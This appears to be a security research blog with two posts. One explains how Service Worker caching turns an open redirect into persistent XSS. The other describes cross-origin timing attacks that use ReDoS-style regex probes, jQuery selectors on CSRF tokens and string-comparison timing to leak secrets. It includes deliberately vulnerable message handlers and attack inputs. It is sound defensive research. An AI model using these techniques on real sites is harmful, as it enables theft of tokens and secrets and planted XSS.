
Now whenever you visit that page you will see an alert instead! You can use Control+Shift+R to undo it, but when you visit the page again, the XSS will come back. It's actually quite difficult to get rid of this XSS. You have to manually delete the cache :(.

This is likely to be an anti-pattern we'll see in new Service-Workers enabled applications often. To prevent this, one of the ideas from Jake Archibald is to simply check the "url" property of the response. If the URL is not the same as the request, then simply not use it, and discard it from the cache. This idea is quite important actually, and I'll explain why below.

When Secure Open Redirects become XSS

A couple years ago in a presentation with thornmaker we explained how open redirects can result in XSS and information leaks, and they were mostly limited to things such as redirecting to insecure protocols (like javascript: or data:). Service Workers, however, and in specific some of the ways that the Cache API is likely to be used, introduce yet another possibility, and one that is quite bad too.

As explained before, the way people seem to be coding over the Cache API is by reading the Request, fetching it, and then caching the Response. This is tricky, because when a service worker renders a response, it renders it from the same origin it was loaded from.

In other words.. let's say you have a website that has an open redirect..
  • https://www.example.com/logout?next=https://www.othersite.com/
And you have a service worker like this one:
  • https://googlechrome.github.io/samples/service-worker/read-through-caching/service-worker.js
What that service worker does, as the previous one, is simply cache all requests that go through by refetching and the service worker will cache the response from evilwebsite.com for the other request!

That means that next time the user goes to:
  • https://www.example.com/logout?next=https://www.evilwebsite.com
The request will be cached and instead of getting a 302 redirect, they will get the contents of evilwebsite.com.

Note that for this to work, evilwebsite.com must include Access-Control-Allow-Origin: * as a response header, as otherwise the request won't be accepted. And you need to make the request be cors enabled (with a cross origin image, or embed request for example).

This means that an open redirect can be converted to a persistent XSS and is another reason why checking the url property of the Response is so important before rendering it (both from Cache and on code like event.respondWith(fetch(event.request))). Because even if you have never had an XSS, you can introduce one by accident. If I had to guess, almost all usages of Service Workers will be vulnerable to one or another variation of these types of attacks if they don't implement the response.url check.

There's a bunch of other interesting things you can do with Service Workers and Requests / Responses, mentioned in the talk and that I'll try to blog about later. For now though, let's change subject.

Web JavaScript Web Development

This will sound weird to some, but the JavaScript APIs in the browser don't actually include any good web APIs for building responses. What this means is that because Service Workers will now be kind-of like Web Servers, but are being put there without having any APIs for secure web development, then it's likely they will introduce a bunch of cool bugs.

JavaScript Web APIs aren't Web Service APIs


For starters, the default concerns are things that affect existing JS-based server applications (like Node.js). Things from RegExp bugs because the JS APIs aren't secure by default to things like the JSON API lack of encoding.

But another more interesting problem is that the lack of templating APIs in Service Workers means people will write code like this which of course means it's gonna be full of XSS. And while you could import a templating library with strict contextual auto-escaping, the lack of a default library means people are just likely to use insecure alternatives or just default to string concatenation (note things like angular and handlebars won't work here, because they work at the DOM level and the Service Workers don't have access to the DOM as they run way before the DOM is created).

It's also worth noting that thanks to the asynchronous nature of Service Workers (event-driven and promise-based) mixed with developers that aren't used to this, is extremely likely to introduce concurrency vulnerabilities in JS if people abuse the global scope, which while isn't the case today, is very likely to be the case soon.

Cross Site Request Forgery


Another concern is that CSRF protection will have to behave differently for Service Workers. In specific, Service Workers will most likely have to depend more on referrer/origin based checks. This isn't bad in and off itself, but mixing this with online web applications will most likely pose a challenge to web applications. Funnily, none of the demos I found online have CSRF protection, which remarks the problem, but also makes it hard for me to give you examples on why it's gonna be hard.

To give a specific example, if a web application is meant to work while offline, how would such application keep track of CSRF tokens? Once the user comes online, it's possible the CSRF tokens won't be valid anymore, and the offline application will have to handle that gracefully. While handling the fallback correctly is possible by simply doing different checks depending on the online state of the application, it's likely more people will get it wrong than right.

Conclusion

I'm really excited to see what type of web applications are developed with Service Workers, and also about what type of vulnerabilities they introduce :). It's too early to know exactly, but some anti-patterns are clearly starting to emerge as a result of the API design, or of the existing mental models on developers' heads.

Another thing I wanted to mention, before closing up is that I'll start experimenting writing some of the defense security tools I mentioned in the talk, if you want to help out as well, please let me know!

Saturday, May 31, 2014

[Matryoshka] - Web Application Timing Attacks (or.. Timing Attacks against JavaScript Applications in Browsers)

Following up on the previous blog post about wrapping overflow leak on frames, this one is also regarding the presentation Matryoshka that I gave in Hamburg during HackPra All Stars 2013 during Appsec Europe 2013.

The subject today is regarding web application timing attacks. The idea behind this attack is a couple of techniques on how to attack another website by using timing attacks. Timing attacks are very popular in cryptography, and usually focus on either remote services, or local applications. Recently, they've become a bit popular, and are being used to attack browser security features.


Today the subject I want to discuss is not attacking the browser, or the operating system, but rather, other websites. In specific, I want to show you how to perform timing attacks cross-domain whenever a value you control is used by another web application.


The impact of successfully exploiting this vulnerability varies depending on the application being attacked. To be clear, what we are attacking are JavaScript heavy applications that handle data somehow controlled by another website, such as cookies, the URL, referrer, postMessage, etc..


Overall though, the attack itself isn't new, and the application of the attack on browsers is probably predictable.. but when discussed it's frequently dismissed as unexploitable, or unrealistic. Now, before I get your hopes up, while I think it's certainly exploitable and realistic, it isn't as straightforward as other attacks.


We know that you can obviously know if your own code runs faster or slower, but, as some of you might want to correct me.. that shouldn't matter. Why? Well, because of the Same Origin Policy. In case you are not aware, the Same Origin Policy dictates that https://puppies.com cant interact with https://kittens.com. It defines a very specific subset of APIs where communication is safe (like, say, navigation, or postMessage, or CORS).

The general wisdom says that to be vulnerable to information leak attacks, you need to opt-in to be vulnerable to them. That is, you have to be doing something stupid for stupid things to happen to you. For example, say you have code that runs a regular expression on some data, like:

onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        e.source.postMessage('got a match!', e.source);
    }
}

Well, of course it will be possible to leak information.. try it out here:

  • The secret is 0.0
  • The secret is 0.1
  • The secret is 0.2
  • ...
  • The secret is 0.9
Regexp:


You can claim this code is vulnerable and no one would tell you otherwise. "You shouldn't be writing code like this (tm)".

Now, what about this?

onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        console.log('got a match');
    }
    e.source.postMessage('finished', e.source);
}

Well, now it's tricky, right? In theory, this script isn't leaking any information to the parent page (except of course, how long it took to run the regular expression). Depending on who you ask, they will tell you this is a vulnerability (or.. not).

Now, it clearly is vulnerable, but let's figure out exactly why. There is one piece of information that is leaked, and that is, how long it took to run the regular expression. We control the regular expression, so we get to run any regular expression and we will get to learn how long it took to run.

If you are familiar with regular expressions, you might be familiar with the term "ReDoS", which is a family of regular expressions that perform a Denial of Service attack on the runtime because they run in exponential time. You can read more about it here. Well, the general premise is that you can make a regular expression take for-ever if you want to.

So, with that information, we can do the same attack as before, but this time, we will infer if we had the right match simply by checking if it took over N seconds to respond to our message, or well... if it returned immediately.

Let's give it a try:


  • The secret is 0.0[0-9.]+(.{0,100}){12}XXX
  • The secret is 0.1[0-9.]+(.{0,100}){12}XXX
  • The secret is 0.2[0-9.]+(.{0,100}){12}XXX
  • ...
  • The secret is 0.9[0-9.]+(.{0,100}){12}XXX
Regexp:



Did you notice that the right answer took longer than the others?

If you are an average security curmudgeon you will still say that the fault is at the vulnerable site, since it's opting-in to leak how long it took to run the regular expression. All developers are supposed to take care of these types of problems, so why not JavaScript developers?

Alright then, let's fix up the code:
onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        console.log('got a match');
    }
}

That clearly has no feedback loop back to the parent page. Can we still attack it?

Well, now it gets tricky. When I told you that the Same Origin Policy isolates kittens.com from puppies.com I wasn't being totally honest. The JavaScript code from both, kittens.com and puppies.com run in the same thread. That is, if you have 3 iframes one pointing to puppies.com, one pointing to kittens.com and one pointing to snakes.com then all of them run in the same thread.

Said in another way, if snakes.com suddenly decides to run into an infinite loop, neither puppies.com nor kittens.com will be able to run in any JavaScript code. Don't believe me? Give it a try!




.

Did you notice that when you looped the "snakes" the counters in the other two iframes stopped? That's because both, the snakes and the puppies and the kittens all run in the same thread, and if one script keeps the thread busy, all the other scripts are paused.

Now, with that piece of information, a whole new world opens upon us. Now, we don't need the other page surrender any information to us. Simply by running in the same thread we do, we can guess how long their code takes to run!

One way to attack this is by simply asking the browser to run a specific piece of code every millisecond, and whenever we don't run, that means there's some other code keeping the interpreter busy at the time. We keep track of these delays and we then learn how long the code took to run.

Alright, but you might feel a bit disappointed, since it's really not common to have code that runs regular expressions on arbitrary content.. so this attack is kinda lame..

Well, not really. Fortunately there are plenty of web applications that will run all sorts of interesting code for us. When I described the attack to Stefano Di Paola (the developer of DOMinator), he told me that he always wanted to figure out what you could do with code that does jQuery(location.hash). This used to be an XSS, but then jQuery fixed it.. so no-more-XSS and if the code starts with a '#', then it is forced as a CSS selector.

He said that perhaps jQuery could leak timing information based on how long it took for it to run a specific selector over the code. I told him that was a great idea, and started looking into it. Turns out, there is a "contains" selector in jQuery that will essentially look at all the text content in the page and try to figure out what nodes "contain" such text.

It essentially finds a node, and then serializes it's text contents, and then searches for such value inside it. In a nutshell it does:

haystack.indexOf(needle);

Which, is interesting, but it doesn't have the ReDoS vector we had with regular expressions. Figuring out if there was a match is significantly more complicated.. We need to know if the "haystack" found something (or not) which sounds, well.. complicated.

Can we get such granularity? Is it possible to detect the difference between "aaaa".indexOf("b") and "aaaa".indexOf("a")? There's clearly a running time difference, but the difference is so small we might not be able to measure it.

There is another, even cooler selector, the "string prefix" selector. Say, you have:

You can match it with:
input[name=csrftoken][value^=X]

But again, this is even more difficult than the indexOf() attack we were doing earlier.. The question now is can we detect string comparisons? Can we get enough accuracy out of performance.now() that we get to know if string comparisons succeed?

To make the question clearer.. can we measure in JavaScript the difference between "wrong" == "right" and "right" == "right"?

In theory, it should be faster to compare "wrong" to "right" because the runtime can stop the comparison on the first character, while to be sure that "right" is equal to "right", then it needs to compare every character in the string to ensure it's exactly the same.

This should be easy to test. In the following iframe we make a quick experiment and measure:

  • Time taken to compare "aaaa.....a" (200k) to "foobar"
  • Time taken to compare "aaaa.....a" to "aaaa.....a"
We make the comparison 100 times to make the timing difference more explicit.

Unless something's gone totally wrong, you should see something like:
aaa..a == foobar : 0ms
aaa..a == aaa..a : 60ms
This strangely looking results mean, mostly, that comparing a very long string takes significantly more time than comparing two obviously different strings. The "obviously", as we will learn, is the tricky part.

What the JavaScript runtimes do is first, they try to take a shortcut. If the lengths are different, then they return false immediately. If they are the same, on the other hand, then they compare char-by-char. As soon as they find a character that doesn't match, it returns false.

But is it significant? And if so, how significant is it? To try and answer that question I ran several experiments. For instance, it's 2-10 times faster to make a "false" comparison, than a "true" comparison with just 18 characters. That means "xxxxxxxxxxxxxxxxxx" == "xxxxxxxxxxxxxxxxxx" runs 2 to 10 times slower than "xxxxxxxxxxxxxxxxxx" == "yyyyyyyyyyyyyyyyy". To be able to detect that, however, we need a lot of comparisons and a lot of samples to reduce noise. In this graph you can see how many thousands of iterations you need to be able to "stabilize" the comparison. What you should see in that graph is something like:

What that graph means is that after 120,000 iterations (that is 120,000 comparisons) the difference between "xxxxxxxxxxxxxxxxxx" == "yyyyyyyyyyyyyyyyy" and "xxxxxxxxxxxxxxxxxx" == "xxxxxxxxxxxxxxxxxx"  is stable and is 6 times slower. And, to be clear, that is 18 characters being different. This means that to be able to notice the 6X difference you would need to bruteforce the 18 characters at once. Even in the most optimistic scenarios, bruteforcing 18 characters is way out the question.

If you try to repeat the experiment with just 2 characters, the results are significantly different (note this graph rounds up results to the closest integer). You won't be able to notice any difference.. at all. The line is flat up to a million iterations. That means that comparing a million times "aa" vs "bb" runs in about the same amount of time (not as impressive as our 6X!).

But.. we don't always need impressive differences to be able to make a decision (see this graph without the rounding). With just two characters the difference looks roughly like this:
Which.. means it usually runs in exactly the same time, sometimes a tiny bit faster, but also many times slightly slower. In essence, it seems to run at about 1.02 times the speed of a false comparison.

Now, the fact this graph looks so messy means our exploit won't be as reliable, and will require significantly more samples to detect any changes. We now have in our hands a probabilistic attack.

To exploit this, we will need to perform the attack a couple hundred or a couple thousand, or a couple million times (this actually depends on the machine, a slow machine has more measurable results, but also has more noise, a fast machine has less measurable results, but we can do more accurate measurements).

With the samples we either average the results, or get the mean of means (which needs a lot of samples) or a chi squared test if we knew the variance or a student t test if you can assume a normal distribution (JavaScript's garbarge collector skews things a bit).


At the end of the day, I ended up creating my own test, and was able to brute force a string in a different origin via code that does:

if (SECRET == userSupplied) {
   // do nothing
}

Here are some results on string comparison on Chrome:
  • It is possible to bruteforce an 18 digit number in about 3 minutes on most machines.
    • Without the timing attack you would need to perform 5 quadrillion comparisons per second. With the timing attack you only need 1 million.
  • It is possible to reliably calculate a 9 character alphanumeric string in about 10 minutes.
    • This is different than the numbers because here we have 37 characters alphabet, and with numbers it's just 10.
If you are interested in playing around with it, and you have patience (a lot of patience!) check this and this. They will literally take 5-10 minutes to run, and it will simply try to order 7 strings according to the time they took to compare. Both of them run about a million string comparisons using window.postMessage as the input, so it takes a while.

If you have even more patience you can run this which will run different combinations of iterations/samples trying to figure out which works best (slow machines work better with less iterations and more samples, faster machines run best with more iterations and less samples).

So, summary!
  • Timing attacks are easy thanks to JavaScript's single-threadness. That might change with things like process isolation, but it will continue to be possible for the time being.
  • String comparison can be measured and attacked, but it's probabilistic and really slow with the existing attacks.
Let me know if you can improve the attack (if you can get it under 1 minute for a 18 digit number you are my hero!), find a problem in the sampling/data, or otherwise are able to generalize the ReDoS exploit to string comparison / indexOf operations :)

Another attack that might be worth discussing is that strings from different origins are both stored in the same hash table. This means that if we were able to measure a hashtable miss from a hashtable match, we could read strings cross-origin.

I spent a lot of time trying to make that to work, but it didn't work out. If you can do it, let me know as well :)

Thanks for reading!